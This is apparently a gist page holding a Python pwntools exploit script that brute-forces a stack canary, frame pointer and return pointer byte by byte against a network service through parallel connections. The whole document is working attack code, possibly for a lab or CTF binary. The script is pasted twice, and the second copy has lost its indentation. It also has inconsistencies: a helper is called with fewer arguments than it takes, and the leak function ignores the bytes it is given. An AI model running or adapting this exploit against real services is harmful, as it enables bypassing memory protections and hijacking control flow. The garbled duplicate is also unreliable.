nbulischeck/bruteforce.py Secret

## bruteforce.py
# -*- coding: utf-8 -*-

from pwn import *
from multiprocessing import Pool

context(os="linux", arch="amd64")

HOST, PORT = ("localhost", 10000)
canary = '' #p64(0x7c7a4f9b520b8000)
frame_ptr = '' #p64(0x7ffefc53f200)
ret_ptr = '' #p64(0x558923000502)
offset = 0x0

def die(error):
    log.failure(error)
    quit()

def leak(byte):
    context.log_level = 'error'
    r = remote(HOST, PORT)

    payload = ''
    payload += "\x90" * offset
    payload += canary
    payload += frame_ptr
    payload += ret_ptr
    payload += chr(byte)

    try:
        r.sendafter("admin:\n", payload, timeout=3)
        res = r.recvuntil("Done.", timeout=3)
        context.log_level = 'info'
        return True
    except:
        context.log_level = 'info'
        return False

def leak_helper(l, string):
    pool = Pool(processes=25)
    result = pool.map(leak, range(0, 256))
    pool.close()
    pool.terminate()
    pool.join()
    if True in result:
        byte = result.index(True)
        return string + chr(byte)
    else:
        die("Could not find byte!")

if not canary:
    log.info('Brute forcing the stack canary')
    with log.progress("Found Bytes") as l:
        for i in p64(0x0):
            canary = leak_helper(canary)
            l.status(str([ord(i) for i in canary]))
        l.success("Done!\nCanary: " + hex(u64(canary)))

if not frame_ptr:
    log.info('Brute forcing the frame pointer')
    with log.progress("Found Bytes") as l:
        for i in p64(0x0):
            frame_ptr = leak_helper(frame_ptr)
            l.status(str([ord(i) for i in frame_ptr]))
        l.success("Done!\nFrame Pointer: " + hex(u64(frame_ptr)))

if not ret_ptr:
    log.info('Brute forcing the return pointer')
    with log.progress("Found Bytes") as l:
        for i in p64(0x0):
            ret_ptr = leak_helper(ret_ptr)
            l.status(str([ord(i) for i in ret_ptr]))
        l.success("Done!\nReturn Pointer: " + hex(u64(ret_ptr)))
	# -- coding: utf-8 --

	from pwn import *
	from multiprocessing import Pool

	context(os="linux", arch="amd64")

	HOST, PORT = ("localhost", 10000)
	canary = '' #p64(0x7c7a4f9b520b8000)
	frame_ptr = '' #p64(0x7ffefc53f200)
	ret_ptr = '' #p64(0x558923000502)
	offset = 0x0

	def die(error):
	log.failure(error)
	quit()

	def leak(byte):
	context.log_level = 'error'
	r = remote(HOST, PORT)

	payload = ''
	payload += "\x90" * offset
	payload += canary
	payload += frame_ptr
	payload += ret_ptr
	payload += chr(byte)

	try:
	r.sendafter("admin:\n", payload, timeout=3)
	res = r.recvuntil("Done.", timeout=3)
	context.log_level = 'info'
	return True
	except:
	context.log_level = 'info'
	return False

	def leak_helper(l, string):
	pool = Pool(processes=25)
	result = pool.map(leak, range(0, 256))
	pool.close()
	pool.terminate()
	pool.join()
	if True in result:
	byte = result.index(True)
	return string + chr(byte)
	else:
	die("Could not find byte!")

	if not canary:
	log.info('Brute forcing the stack canary')
	with log.progress("Found Bytes") as l:
	for i in p64(0x0):
	canary = leak_helper(canary)
	l.status(str([ord(i) for i in canary]))
	l.success("Done!\nCanary: " + hex(u64(canary)))

	if not frame_ptr:
	log.info('Brute forcing the frame pointer')
	with log.progress("Found Bytes") as l:
	for i in p64(0x0):
	frame_ptr = leak_helper(frame_ptr)
	l.status(str([ord(i) for i in frame_ptr]))
	l.success("Done!\nFrame Pointer: " + hex(u64(frame_ptr)))

	if not ret_ptr:
	log.info('Brute forcing the return pointer')
	with log.progress("Found Bytes") as l:
	for i in p64(0x0):
	ret_ptr = leak_helper(ret_ptr)
	l.status(str([ord(i) for i in ret_ptr]))
	l.success("Done!\nReturn Pointer: " + hex(u64(ret_ptr)))